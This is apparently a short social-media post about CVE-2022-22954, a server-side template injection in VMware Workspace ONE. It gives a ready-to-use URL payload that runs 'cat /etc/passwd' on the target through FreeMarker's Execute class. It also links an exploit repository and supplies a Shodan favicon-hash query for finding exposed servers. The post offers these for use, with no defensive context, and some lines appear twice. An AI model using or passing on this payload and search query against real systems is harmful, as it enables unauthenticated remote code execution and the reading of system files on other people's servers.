VMware Workspace ONE — SSTI (CVE-2022-22954)
Successful exploitation could lead to RCE from an unauthenticated user.
Payload:
https://github.com/bewhale/CVE-2022-22954
Shodan Dork:
Successful exploitation could lead to RCE from an unauthenticated user.
Payload:
https://victim/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
Exploit:https://github.com/bewhale/CVE-2022-22954
Shodan Dork:
http.favicon.hash:-1250474341
#vmware #workspace #ssti #cve